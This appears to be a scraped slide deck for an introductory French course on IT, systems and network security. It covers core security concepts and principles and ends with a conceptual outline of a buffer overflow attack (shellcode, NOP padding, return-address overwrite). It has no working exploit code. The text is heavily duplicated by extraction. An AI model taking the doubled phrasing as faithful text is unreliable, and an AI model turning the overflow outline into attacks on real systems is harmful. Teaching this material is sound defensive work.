327
Cours d’ initiation Cours d’ initiation à la sécurité à la sécurité informatique, informatique, systèmes et réseaux systèmes et réseaux Cyril Voisin Cyril Voisin cyril.voisin cyril.voisin supinfo.com supinfo.com

Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Embed Size (px)

Citation preview

Page 1: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cours d’ initiation à la Cours d’ initiation à la sécurité informatique, sécurité informatique, systèmes et réseauxsystèmes et réseaux

Cyril VoisinCyril Voisincyril.voisin supinfo.comcyril.voisin supinfo.com

Page 2: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

PrérequisPrérequisConnaissances générales en informatiqueConnaissances générales en informatiqueConnaissances réseau (couches OSI, Connaissances réseau (couches OSI, TCP/IP)TCP/IP)Notions sur l’architecture matérielle des Notions sur l’architecture matérielle des PC et sur le fonctionnement des systèmes PC et sur le fonctionnement des systèmes d’exploitation multitâchesd’exploitation multitâchesDu bon sens, de la logique, du sens Du bon sens, de la logique, du sens critiquecritique……

Page 3: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SommaireSommaireIntroductionIntroductionModule 1 : rappels Module 1 : rappels

1A - Rappels sur les notions 1A - Rappels sur les notions fondamentales de sécuritéfondamentales de sécurité

Les bases (analyse et gestion Les bases (analyse et gestion de risques, politique de de risques, politique de sécurité, méthode, loi)sécurité, méthode, loi)

Les grands conceptsLes grands conceptsClassiquesClassiques

Confidentialité Confidentialité IntégritéIntégritéDisponibilitéDisponibilité

AutresAutres

Authentification (vs Authentification (vs Identification)Identification)

Non Non répudiationrépudiation

Anti-rejeuAnti-rejeuConcept Concept

émergent : respect de la vie émergent : respect de la vie privéeprivée

Les principesLes principesAbsence de confianceAbsence de confianceDéfense en profondeurDéfense en profondeurMoindre privilègeMoindre privilègeRéduction de la surface Réduction de la surface d’attaqued’attaqueBesoin de savoir (interdiction Besoin de savoir (interdiction par défaut)par défaut)Bonne gestionBonne gestionMulticultureMulticulture

Notions de développement Notions de développement sécurisésécurisé

Buffer overflowsBuffer overflowsCross site scriptingCross site scriptingInjection SQLInjection SQL

Page 4: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SommaireSommaire1B - Rappels sur la 1B - Rappels sur la cryptologie cryptologie

DéfinitionsDéfinitionsCryptographieCryptographieCryptanalyseCryptanalyse

Notions fondamentales Notions fondamentales HistoireHistoirePrincipe de Kerckhoffs Principe de Kerckhoffs (XIXème siècle)(XIXème siècle)VocabulaireVocabulaireCryptographie symétrique (clé Cryptographie symétrique (clé secrète)secrète)

Cryptographie parfaiteCryptographie parfaiteCryptographie asymétrique Cryptographie asymétrique (clé publique / clé privée)(clé publique / clé privée)Condensé (hachage)Condensé (hachage)Notion de signature Notion de signature numériquenumériqueConfiance en une clé Confiance en une clé publiquepublique

Module 2 : sécurité des Module 2 : sécurité des systèmessystèmes 2A - Contrôle d’accès2A - Contrôle d’accès

De l’authentification à De l’authentification à l’autorisationl’autorisation

Mots de passeMots de passe KerberosKerberos AnnuaireAnnuaire Différents types de contrôles Différents types de contrôles

d’accès (d’accès (Mandatory Access Mandatory Access ControlControl vs vs Discretionary Discretionary Access ControlAccess Control, , Role Based Role Based Access ControlAccess Control))

AuditAudit RADIUSRADIUS Authentification forte (carte à Authentification forte (carte à

puce, token SecurID, puce, token SecurID, Audiosmartcard…)Audiosmartcard…)

Page 5: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SommaireSommaire2B - Systèmes d’exploitation2B - Systèmes d’exploitation

Notion de TCB, de Reference Notion de TCB, de Reference Monitor et de Security KernelMonitor et de Security Kernel

Modèles de sécurité (Bell-Modèles de sécurité (Bell-Lapadula, Biba, Clark-Wilson, Lapadula, Biba, Clark-Wilson, Brewer-Nash)Brewer-Nash)

Critères communs (CC)Critères communs (CC) Canaux cachésCanaux cachés StéganographieStéganographie BackdoorsBackdoors Quelques exemples Quelques exemples

Trusted SolarisTrusted SolarisSecurity Enhanced LinuxSecurity Enhanced LinuxWindowsWindows

2C - Aperçu d’architectures 2C - Aperçu d’architectures matériellesmatérielles

La sécurité physiqueLa sécurité physique Les signaux compromettants Les signaux compromettants

(Tempest)(Tempest) Cartes à puceCartes à puce Cartes crypto accélératricesCartes crypto accélératrices Innovations dans les CPU Innovations dans les CPU

(NX)(NX) NGSCBNGSCB

Page 6: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SommaireSommaire2D - Applications2D - Applications

Bases de donnéesBases de données Applications WebApplications Web Portails Portails Gestion de droits numériquesGestion de droits numériques Applications bureautiquesApplications bureautiques Systèmes embarqués fixes et Systèmes embarqués fixes et

mobiles (téléphones, PDA)mobiles (téléphones, PDA) Web ServicesWeb Services (standards WS-(standards WS-

Security et au dessus)Security et au dessus)

2E - Codes malveillants2E - Codes malveillants VirusVirus VerVer Cheval de TroieCheval de Troie EspiogicielEspiogiciel Menaces combinéesMenaces combinées

CanularsCanulars PhishingPhishing Moyens de préventionMoyens de prévention

2F – Outils de sécurité2F – Outils de sécurité AntivirusAntivirus Anti-spywareAnti-spyware Scanners de vulnérabilitésScanners de vulnérabilités Gestion de la sécuritéGestion de la sécurité Patch management, Patch management,

ex :WSUSex :WSUS EFSEFS

Page 7: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SommaireSommaireModule 3 : sécurité des réseauxModule 3 : sécurité des réseaux

3A - Rappels3A - Rappels Couches OSICouches OSI Menaces couches bassesMenaces couches basses Menaces sur les équipements Menaces sur les équipements

réseauréseau IPIP Protocoles courants (TCP, Protocoles courants (TCP,

UDP, ICMP)UDP, ICMP) PABXPABX Bonnes pratiquesBonnes pratiques

3B - Pare-feu3B - Pare-feu Pare-feuPare-feu Filtrage de paquetsFiltrage de paquets SPI (Stateful Packet Inspection)SPI (Stateful Packet Inspection) Pare-feu applicatifsPare-feu applicatifs RéflexionsRéflexions Architectures type de pare-feu Architectures type de pare-feu

d’entreprise (DMZ, NAT)d’entreprise (DMZ, NAT) Pare-feu personnelsPare-feu personnels

3C- Détection et prévention 3C- Détection et prévention d’intrusiond’intrusion

IDSIDS IPSIPS NIDS / HIDS / modules NIDS / HIDS / modules

noyauxnoyaux Problèmes courantsProblèmes courants Techniques de détection et Techniques de détection et

d’évasiond’évasion Exemples de produitsExemples de produits Règles de signaturesRègles de signatures NormalisationNormalisation Les pots de mielLes pots de miel

Page 8: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SommaireSommaire3D – Protocoles3D – Protocoles

IPsecIPsecAHAHESPESP

VPNVPNPPTPPPTPL2TP/IPsecL2TP/IPsec

SSL/TLSSSL/TLS SSHSSH

3E - Quarantaine3E - Quarantaine Quarantaines des accès distantsQuarantaines des accès distants Quarantaine LAN (NAP/NAC)Quarantaine LAN (NAP/NAC)

3F - Wi-Fi3F - Wi-Fi Options de sécurité possibles Options de sécurité possibles

(dont faiblesses de (dont faiblesses de WEP,VPN…)WEP,VPN…)

HistoriqueHistorique 802.1x802.1x RADIUSRADIUS EAP-TLSEAP-TLS PEAP-EAP-TLSPEAP-EAP-TLS WPA (dont TKIP, PSK)WPA (dont TKIP, PSK) 802.11i (WPA2)802.11i (WPA2) Exemple de mise en œuvre : Exemple de mise en œuvre :

WindowsWindows

Page 9: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ÉvaluationÉvaluationUn test en fin de coursUn test en fin de cours 2 heures, sans document2 heures, sans document Forme non définitiveForme non définitive

Formule mixteFormule mixte Une partie de QCM / questions à réponses courtes (15 points Une partie de QCM / questions à réponses courtes (15 points

environ)environ)Questions du support de cours (ou peu éloignées du Questions du support de cours (ou peu éloignées du contenu du cours)contenu du cours)2 à 4 points sur des points évoqués durant les heures de 2 à 4 points sur des points évoqués durant les heures de courscours

Une partie rédigée (de -5 à +5 points environ) de manière Une partie rédigée (de -5 à +5 points environ) de manière concise et argumentéeconcise et argumentée

Sur un ou des problèmes de synthèse (analyse / réflexion)Sur un ou des problèmes de synthèse (analyse / réflexion)Peut donner lieu à une note négativePeut donner lieu à une note négative

Formule QCMFormule QCM

Page 10: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IntroductionIntroduction

Page 11: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IntroductionIntroductionLes systèmes d’information remplissent des Les systèmes d’information remplissent des fonctions critiques dans les organisations et fonctions critiques dans les organisations et états modernesétats modernes OrdinateursOrdinateurs Réseaux d’entrepriseRéseaux d’entreprise Systèmes de communication (PABX, réseaux Systèmes de communication (PABX, réseaux

telecom, satellites…)telecom, satellites…) Infrastructures critiques (énergie, défense)Infrastructures critiques (énergie, défense) Systèmes embarquésSystèmes embarqués ……Convergence numérique (Internet, téléphonie, Convergence numérique (Internet, téléphonie, domotique, dématérialisation de procédures)domotique, dématérialisation de procédures)Risques liés à une dépendance grandissanteRisques liés à une dépendance grandissante

Page 12: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Pourquoi & pour quoi ?Pourquoi & pour quoi ?Les organisations doivent protéger leurs biens Les organisations doivent protéger leurs biens pour prospérer, voire survivrepour prospérer, voire survivreLa sécurité informatique n’est qu’un pan de la La sécurité informatique n’est qu’un pan de la sécurité de l’information, elle-même incluse dans sécurité de l’information, elle-même incluse dans la notion de sécuritéla notion de sécuritéQuelques biens à protéger :Quelques biens à protéger : MatérielMatériel DocumentationDocumentation LogicielsLogiciels DonnéesDonnées Réputation, imageRéputation, image ……

Page 13: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Sécurité - définitionsSécurité - définitionsSécuritéSécurité Situation dans laquelle quelqu’un, quelque Situation dans laquelle quelqu’un, quelque

chose n'est exposé à aucun danger, à aucun chose n'est exposé à aucun danger, à aucun risque d'agression physique, d'accident, de vol, risque d'agression physique, d'accident, de vol, de détériorationde détérioration

Situation de quelqu’un qui se sent à l'abri du Situation de quelqu’un qui se sent à l'abri du danger, qui est rassurédanger, qui est rassuré

SécuriséSécurisé Qu’est-ce qui a été sécurisé ? Par rapport à Qu’est-ce qui a été sécurisé ? Par rapport à

quoi ? A qui ? Contre quoi ? quoi ? A qui ? Contre quoi ? Pour combien de Pour combien de temps ? Jusqu’à quel niveau d’attaque ?temps ? Jusqu’à quel niveau d’attaque ? La sécurité est une notion relative à un contexteLa sécurité est une notion relative à un contexte

Page 14: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

De la relativité de la sécuritéDe la relativité de la sécurité« The only truly secure system is one that « The only truly secure system is one that is powered off, cast in a block of concrete is powered off, cast in a block of concrete and sealed in a lead-lined room with and sealed in a lead-lined room with armed guards - and even then I have my armed guards - and even then I have my doubts. »doubts. » Eugene H. Spafford Eugene H. Spafford ((http://http://

www.cerias.purdue.edu/homes/spaf/quotes.htmlwww.cerias.purdue.edu/homes/spaf/quotes.html))

Page 15: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

L’avantage de l’attaquant et le L’avantage de l’attaquant et le dilemme du défenseurdilemme du défenseur

Principe n°1Principe n°1 Le défenseur doit défendre tous les points; l’attaquant Le défenseur doit défendre tous les points; l’attaquant peut choisir le point le plus faiblepeut choisir le point le plus faiblePrincipe n°2Principe n°2 Le défenseur ne peut défendre que ce Le défenseur ne peut défendre que ce qu’il connaît; l’attaquant peut rechercher des points qu’il connaît; l’attaquant peut rechercher des points vulnérablesvulnérablesPrincipe n°3Principe n°3 Le défenseur se doit d’être vigilant en Le défenseur se doit d’être vigilant en permanence; l’attaquant peut attaquer quand il le permanence; l’attaquant peut attaquer quand il le veutveutPrincipe n°4Principe n°4 Le défenseur doit respecter les règles; Le défenseur doit respecter les règles; l’attaquant peut faire ce qu’il veutl’attaquant peut faire ce qu’il veut

Page 16: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les 3 facettes de la sécuritéLes 3 facettes de la sécurité

ArchitectureArchitecturesécuriséesécurisée

Technologies

Technologies

OSOS

Annuaire

Annuaire

Correctifs

Correctifs

IPSECIPSEC

KerberosKerberos

PKIPKI

ChiffrementChiffrement

de fichiersde fichiers

SSL/TLS

SSL/TLS

Clusters

ClustersDétection Détection

d’intrusiond’intrusion

Gestion de systèmes

Gestion de systèmes

SupervisionSupervision

Pare-feuPare-feu

Antivirus

Antivirus

PersonnesPersonnesAdmin.Admin.de l’Entreprise

de l’EntrepriseAdmin.

Admin.

Du Domaine

Du DomaineService/Service/

SupportSupport

Développeur

DéveloppeurUtilisateurUtilisateur

ArchivageArchivage

PolitiquePolitiqued’accès

d’accès

Installa

tion

Installa

tion

RéparationRéparationGes

tion des

Gestio

n des

évén

emen

ts

évén

emen

ts

Gestion desGestion desperfsperfs

Gestion du

Gestion du

Changement /

Changement /

de la Configuration

de la Configuration

Proc

essu

s

Proc

essu

s

RestaurationRestauration Sauvegarde

SauvegardeRéponse à Réponse à IncidentIncident

Évalua

tion

Évalua

tion

de ri

sque

s

de ri

sque

s

Page 17: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Une activité continueUne activité continueLa sécurité La sécurité ne se met pas en œuvre en une ne se met pas en œuvre en une seule foisseule fois. . Elle fait Elle fait partie intégrante partie intégrante du cycle de vie du du cycle de vie du système. système. Il s’agit d’un processus itératif qui n’est Il s’agit d’un processus itératif qui n’est jamais jamais finifini et doit être et doit être corrigé et testé régulièrement. corrigé et testé régulièrement.

La sécurité absolue est inatteignable, c’est La sécurité absolue est inatteignable, c’est un voyage, pas une destination (cf An un voyage, pas une destination (cf An

2000 sans date butoir)2000 sans date butoir)

Page 18: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 1Module 1RappelsRappels

1A - Rappels sur les notions 1A - Rappels sur les notions fondamentales de sécuritéfondamentales de sécurité

Page 19: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

RappelsRappelsCe que nous ne verrons pasCe que nous ne verrons pas Analyse et gestion de risqueAnalyse et gestion de risque Politique de sécuritéPolitique de sécurité Normes, standards, méthodes Normes, standards, méthodes

Norme ISO 17799 Norme ISO 17799 MARION, MEHARI, MELISA, EBIOSMARION, MEHARI, MELISA, EBIOSITILITILModélisation des menacesModélisation des menaces

La veille : le rôle des CERTLa veille : le rôle des CERT Aspects juridiques (loi Godefrain, loi sur la Aspects juridiques (loi Godefrain, loi sur la

sécurité financière, LCEN, jurisprudence en sécurité financière, LCEN, jurisprudence en matière de cybersurveillance…)matière de cybersurveillance…)

Page 20: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ConceptsConceptsLes 3 grands classiques:Les 3 grands classiques: Confidentialité Confidentialité IntégritéIntégrité DisponibilitéDisponibilité

Les autresLes autres Authentification (vs Identification)Authentification (vs Identification) Non répudiationNon répudiation Anti-rejeuAnti-rejeu Concept émergent : respect de la vie privéeConcept émergent : respect de la vie privée

Page 21: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ConfidentialitéConfidentialitéDisponibilité et divulgation limitées aux Disponibilité et divulgation limitées aux seules entités autoriséesseules entités autoriséesEx : Ex : Empêcher la lecture de données pendant la Empêcher la lecture de données pendant la

transmission ou le stockage pour des transmission ou le stockage pour des personnes non autoriséespersonnes non autorisées

Seuls l’expéditeur et le destinataire d’un Seuls l’expéditeur et le destinataire d’un message connaissent l’informationmessage connaissent l’information

« « Ma recette du mi-cuit au chocolat n’est Ma recette du mi-cuit au chocolat n’est connue que de moi et de ma sœur connue que de moi et de ma sœur »»

Page 22: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IntégritéIntégritéAbsence d’altération ou de destructionAbsence d’altération ou de destructionEx : Ex : Protection contre une modification non Protection contre une modification non

autoriséeautorisée Vérification qu’un message n’a pas été Vérification qu’un message n’a pas été

modifiémodifié «« Ma recette du mi-cuit au chocolat n’a pas  Ma recette du mi-cuit au chocolat n’a pas

été modifiée sans que je m’en rende compte été modifiée sans que je m’en rende compte »»

Page 23: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

DisponibilitéDisponibilitéCapacité à répondre à un instant précis, à Capacité à répondre à un instant précis, à être accessible dans des conditions être accessible dans des conditions définies de performance, d’horairesdéfinies de performance, d’horairesEx : Ex : les données sont accessibles au moment où les données sont accessibles au moment où

on en a besoin (pas de déni de service pour on en a besoin (pas de déni de service pour une personne autorisée)une personne autorisée)

« « Lorsque je veux faire un mi-cuit au chocolat, Lorsque je veux faire un mi-cuit au chocolat, je peux accéder à ma recette je peux accéder à ma recette »»

Page 24: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AuthentificationAuthentificationVérification / validation d’une identité d’une Vérification / validation d’une identité d’une entitéentitéEx : Ex : Vérifier l’identité d’un utilisateur, d’une Vérifier l’identité d’un utilisateur, d’une

machine ou d’un programmemachine ou d’un programme Connaître de manière sure celui qui a envoyé Connaître de manière sure celui qui a envoyé

le messagele message

Remarque : l’identification est l’action de Remarque : l’identification est l’action de fournir son identité proclamée (ex : nom fournir son identité proclamée (ex : nom d’utilisateur)d’utilisateur)

Page 25: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Non répudiationNon répudiationImpossibilité de nier avoir participéImpossibilité de nier avoir participéEx : Ex : L’expéditeur d’un message ne peut pas L’expéditeur d’un message ne peut pas

prétendre ne pas l’avoir envoyéprétendre ne pas l’avoir envoyé Le destinataire d’un message ne peut pas Le destinataire d’un message ne peut pas

prétendre ne pas l’avoir reçuprétendre ne pas l’avoir reçu

Page 26: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Anti-rejeuAnti-rejeuImpossibilité de rejouer une séquence Impossibilité de rejouer une séquence d’événements ou d’actions enregistrésd’événements ou d’actions enregistrésEx : Ex : Les données interceptées ne peuvent pas Les données interceptées ne peuvent pas

être utilisées pour se faire passer pour être utilisées pour se faire passer pour l’émetteur originall’émetteur original

On ne peut pas enregistrer les transmissions On ne peut pas enregistrer les transmissions effectuées lors d’une transaction entre deux effectuées lors d’une transaction entre deux entités et les rejouer pour provoquer une entités et les rejouer pour provoquer une nouvelle transaction validenouvelle transaction valide

Page 27: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Concept émergentConcept émergentNotion de protection de la vie privée :Notion de protection de la vie privée : protection contre la découverte et la mauvaise protection contre la découverte et la mauvaise

utilisation de son identitéutilisation de son identité Ex :Ex :

AnonymatAnonymatPseudonymatPseudonymatAbsence de possibilité d’établir des liensAbsence de possibilité d’établir des liensImpossibilité d’être observéImpossibilité d’être observé

Maturité et sensibilité plus importante en EuropeMaturité et sensibilité plus importante en EuropeRespect de la vie privée souvent menacé par Respect de la vie privée souvent menacé par des impératifs d’amélioration de sécurité (cf USA des impératifs d’amélioration de sécurité (cf USA et les attentats du 11 septembre 2001)et les attentats du 11 septembre 2001)

Page 28: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Quelques grands principesQuelques grands principesAbsence de confiance / méfiance par Absence de confiance / méfiance par défautdéfautDéfense en profondeurDéfense en profondeurMoindre privilègeMoindre privilègeRéduction de la surface d’attaqueRéduction de la surface d’attaqueBesoin de savoirBesoin de savoirBonne gestionBonne gestionMulticultureMulticulture

Page 29: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Défiance et méfiance par défautDéfiance et méfiance par défautAbsence de confiance sans fait ni preuve Absence de confiance sans fait ni preuve Quoi qu’il en soit, la complexité des SI est Quoi qu’il en soit, la complexité des SI est telle qu’il arrive toujours un moment où il telle qu’il arrive toujours un moment où il faut accorder un minimum de confiance faut accorder un minimum de confiance (l’approche paranoïaque a donc ses (l’approche paranoïaque a donc ses limites)…limites)…Qui plus est, les faits produits sont en Qui plus est, les faits produits sont en général insuffisants pour fournir une général insuffisants pour fournir une certitude absolue (si ce n’est celle de ne certitude absolue (si ce n’est celle de ne pas pouvoir avoir de certitude absolue)pas pouvoir avoir de certitude absolue)

Page 30: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Défense en profondeurDéfense en profondeurIdée : mettre en place plusieurs barrières pour Idée : mettre en place plusieurs barrières pour protéger ce qui doit l’être de façon à ce que si protéger ce qui doit l’être de façon à ce que si une des barrières venait à être franchieune des barrières venait à être franchieMise en place de différentes couches de Mise en place de différentes couches de protection (au moins 2) à différents niveaux protection (au moins 2) à différents niveaux on raisonne toujours comme si les autres éléments de on raisonne toujours comme si les autres éléments de

protection n’allaient pas fonctionnerprotection n’allaient pas fonctionnerCouchesCouches PhysiquePhysique RéseauRéseau MachineMachine ApplicationApplication DonnéesDonnées

Page 31: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Moindre privilègeMoindre privilègeNe jamais utiliser plus de privilèges que ce Ne jamais utiliser plus de privilèges que ce qui est le minimum nécessaire pour qui est le minimum nécessaire pour réaliser une tâche qu’on a le droit réaliser une tâche qu’on a le droit d’accomplird’accomplirExemples :Exemples : Pour lire un fichier, on ne demande pas les Pour lire un fichier, on ne demande pas les

accès en lecture / écritureaccès en lecture / écriture Pour exécuter un programme de lecture d’e-Pour exécuter un programme de lecture d’e-

mails on n’utilise pas un compte mails on n’utilise pas un compte administrateur / rootadministrateur / root

Page 32: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Réduction de la surface d’attaqueRéduction de la surface d’attaqueLa surface d’attaque est l’ensemble de ce qui peut être La surface d’attaque est l’ensemble de ce qui peut être utilisé par un attaquant pour réussir son attaque (ports utilisé par un attaquant pour réussir son attaque (ports réseau ouverts, services en cours d’exécution, privilèges réseau ouverts, services en cours d’exécution, privilèges des comptes sous lesquels ces services s’exécutent, des comptes sous lesquels ces services s’exécutent, permissions sur les fichiers, …)permissions sur les fichiers, …)Il faut avoir la surface d’attaque la plus petite possible Il faut avoir la surface d’attaque la plus petite possible (moins de points de vulnérabilité possibles)(moins de points de vulnérabilité possibles)ExempleExemple

Éviter les installations par défaut (comptes par défaut, Éviter les installations par défaut (comptes par défaut, composants par défauts, exemples pré-installés)composants par défauts, exemples pré-installés)

Ne pas installer de composants dont on ne se sert pas / Ne pas installer de composants dont on ne se sert pas / désinstaller ceux qui sont inutilisésdésinstaller ceux qui sont inutilisés

Installer les services avec des comptes aux privilèges réduits Installer les services avec des comptes aux privilèges réduits (ne pas sombrer dans la facilité de tout mettre administrateur ou (ne pas sombrer dans la facilité de tout mettre administrateur ou root)root)

Page 33: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Besoin de savoirBesoin de savoirPendant du principe du moindre privilège Pendant du principe du moindre privilège pour le contrôle d’accèspour le contrôle d’accèsInterdiction par défaut : TOUT est interdit Interdiction par défaut : TOUT est interdit implicitement SAUF ce qui est autorisé implicitement SAUF ce qui est autorisé explicitementexplicitementN’est autorisé que ce qui est nécessaire N’est autorisé que ce qui est nécessaire pour réaliser les tâches attribuéespour réaliser les tâches attribuées

Page 34: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Bonne gestionBonne gestionLe système d’information pour être Le système d’information pour être sécurisé se doit d’être bien gérésécurisé se doit d’être bien géréCeci suppose Ceci suppose Une politique de sécurité bien définie avec Une politique de sécurité bien définie avec

ses procédures associéesses procédures associées Des personnes forméesDes personnes formées Des technologies qui peuvent être Des technologies qui peuvent être

administrées efficacementadministrées efficacementExemplesExemples Un pare-feu bien géré est avant tout un pare-Un pare-feu bien géré est avant tout un pare-

feu maîtriséfeu maîtrisé

Page 35: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

MulticultureMulticultureQuand on est en mesure de bien gérer les Quand on est en mesure de bien gérer les produits que l’on utilise, on peut les panacher et produits que l’on utilise, on peut les panacher et les installer en cascade / redondanceles installer en cascade / redondanceExempleExemple 2 pare-feu de technologies et de constructeurs 2 pare-feu de technologies et de constructeurs

différents en cascade à l’entrée du réseaudifférents en cascade à l’entrée du réseau 2 antivirus (un sur les passerelles et/ou les serveurs, 2 antivirus (un sur les passerelles et/ou les serveurs,

un sur les postes de travail)un sur les postes de travail) Attention : multiplier les technologies sans les Attention : multiplier les technologies sans les

maîtriser est plus risqué que de n’avoir qu’une seule maîtriser est plus risqué que de n’avoir qu’une seule technologie bien géréetechnologie bien gérée

Page 36: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Notions élémentaires de Notions élémentaires de développement sécurisédéveloppement sécurisé

Quelques attaquesQuelques attaques Buffer overrun (stack overflow, integer Buffer overrun (stack overflow, integer

overflow)overflow) Cross site scriptingCross site scripting Injection SQLInjection SQL ……Ou pourquoi il ne faut jamais faire Ou pourquoi il ne faut jamais faire confiance aux paramètres transmis par confiance aux paramètres transmis par l’utilisateur (« l’utilisateur (« NEVER TRUST USER NEVER TRUST USER INPUTINPUT ») »)

Page 37: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Buffer overflowBuffer overflowLe premier connu : le ver de MorrisLe premier connu : le ver de MorrisArticle dans Phrack Magazine « Article dans Phrack Magazine « Smashing the Smashing the stack for fun and profitstack for fun and profit » » http://www.phrack.org/show.php?p=49&a=14http://www.phrack.org/show.php?p=49&a=14

En grosEn gros Passage d’un Passage d’un shellcodeshellcode dans un tampon mal contrôlé dans un tampon mal contrôlé Remplissage avec instructions sans effet (NOP par Remplissage avec instructions sans effet (NOP par

exemple)exemple) Éventuellement, camouflage par encodage avec XORÉventuellement, camouflage par encodage avec XOR Écrasement d’une structure intéressanteÉcrasement d’une structure intéressante Saut vers le début du Saut vers le début du shellcodeshellcode

Page 38: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Addition des deux (en utilisant une fonction de copie)

Vos donnéesVos donnéesallouéesallouées

Adresse deAdresse deretourretour

ArgumentsArgumentsde la fonctionde la fonction

Buffer overrunBuffer overrun

Tampon dans bar()Tampon dans bar() Adresse de Adresse de retour vers foo()retour vers foo()

Arguments deArguments debar()bar()

Une pile (foo() vient d’appeler bar())

Un tampon dangereux

Code AssembleurCode Assembleur Adresse de débutAdresse de début

Piraté!Piraté!

